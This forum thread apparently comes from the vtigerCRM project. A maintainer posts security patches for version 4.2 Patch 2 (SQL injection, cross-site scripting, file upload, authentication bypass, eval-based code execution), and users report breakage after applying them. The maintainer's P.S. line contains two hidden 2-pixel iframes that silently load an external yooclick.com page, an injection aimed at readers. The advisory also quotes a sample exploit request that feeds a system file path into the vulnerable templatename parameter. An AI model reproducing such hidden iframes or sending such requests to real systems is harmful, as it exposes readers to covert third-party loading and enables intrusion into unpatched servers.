Hi,
We have fixed the following vulnerability issues for vtigerCRM 4.2 Patch 2 version, kindly download the attached zip file and unzip it under your vtigerCRM home directory.
The list of vulnerability issues fixed are
Posted by D.Fabian / SEC-CONSULT/ ww.sec-consult.com
a) Multiple SQL Injection Vulnerabilities
b) Cross Site Scripting
c) Path Traversal/File Disclosure
d) Arbitrary File Upload
Posted by Christopher Kunz / <!-- w --><a class="postlink" href="http://www.hardened-php.net">www.hardened-php.net</a><!-- w -->
a) Arbitrary File Upload
b) Authentication ByPass
c) Unsafe File Inclusion
d) Arbitrary code execution
List of files changed
a) index.php
b) modules/Users/Authenticate.php
c) include/utils.php
d) include/database/PearDatabase.php
e) modules/uploads/add2db.php
f) data/CRMEntity.php
g) log4php/appenders/LoggerAppenderFile.php
Note: Kindly apply the fixes on vtigeCRM 4.2 Patch 2 version of files, please note that after applying the patch the read permssion for vtigecrm.log file will be revoked for linux users, however for windows users kindly change the permissions manually.
Philip
P.S Kindly take a back up these files incase you have made some changes to the files. <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
Comments
with respect to the arbitrary upload issue, the fix is helpful, but is there a good reason why the original $upload_dir (set in /config.php) has been replaced by $uploaddir (set in /modules/uploads/add2db.php)? it seems to me that the logical place to set such a value *is* /config.php.
aside from the fact it's essentially a constant, putting it in /config.php would make more sense from an upgradeability standpoint.
oh, and it would also seem to be sensible to change the default upload directory to something outside of the site tree. people should have to change the defaults to make it less secure as opposed to the other way around.
yes! it's a valid suggestion we'll take this up in our future release.
we'll check the feasibility of making the upload directory configurable, in config.php and implement this if it does'nt have any adverse effect.
philip
here is the consolidated vulnerability fix in zip format for vtigercrm 4.2 patch 2, this zip has the fix for the following vulnerability issue in addition to the fixes given earlier.
vulnerability issue addressed:
remote code execution (posted by d.fabian / sec-consult/ ww.sec-consult.com)
the paramter "templatename" is passed to eval() without any prior validation.
example:
index.php?module=users&action=templatemerge&templatename=c:\boot.ini
fix:
in mail merge, templateid will be invoked instead of templatename. following files has been modified
1) adodb/databaseschema.xml
2) modules/accounts/detailview.php
3) modules/accounts/merge.php
4) modules/contacts/detailview.php
5) modules/contacts/merge.php
6) modules/helpdesk/detailview.php
7) modules/helpdesk/merge.php
8 ) modules/leads/detailview.php
9) modules/leads/merge.php
10) modules/users/add2db.php
11) modules/users/binaryfilelist.php
12) modules/users/deletewordtemplate.php
13) modules/users/downloadfile.php
14) modules/users/listwordtemplates.php
15) modules/users/upload.php
16) modules/users/userinfoutil.php
procedure to apply:
1) download the zip and unzip it under vtigercrm home directory (where your index.php resides)
2) run the file wordtemplate_fix.php (present inside the vtigercrm home directory) from your web browser. "table 'wordtemplates' modified" message will be displayed, which ensures the required changes has been done in the wordtemplate table.
philip
it is really good to have these security updates! after applying this fix uploading of word-templates, merge in accounts and merge in helpdesk is working perfectly but in leads and contacts mail merge is giving following errors:
in leads error is:
warning: fopen(/home/public_html/vtiger/test/wordtemplatedownload/): failed to open stream: is a directory in /home/public_html/vtiger/modules/leads/merge.php on line 56
warning: fwrite(): supplied argument is not a valid stream resource in /home/public_html/vtiger/modules/leads/merge.php on line 58
warning: fclose(): supplied argument is not a valid stream resource in /home/public_html/vtiger/modules/leads/merge.php on line 59
and in contacts error is:
fatal error: call to a member function on a non-object in /home/public_html/vtiger/include/database/peardatabase.php on line 426
-ts-
thanks for pointing this out, the issue in contact and lead module during merge has been fixed, please use the attached consolidated zip.
philip
procedure to apply:
1) download the zip and unzip it under vtigercrm home directory (where your index.php resides)
2) run the file wordtemplate_fix.php (present inside the vtigercrm home directory) from your web browser. "table 'wordtemplates' modified" message will be displayed, which ensures the required changes has been done in the wordtemplate table.
when i apply the security changes in test, i get my contacts and accounts showing only their names, the page is very wide as it shows all 1159 contact links in the view bar, and i lose the email button on these pages.
jay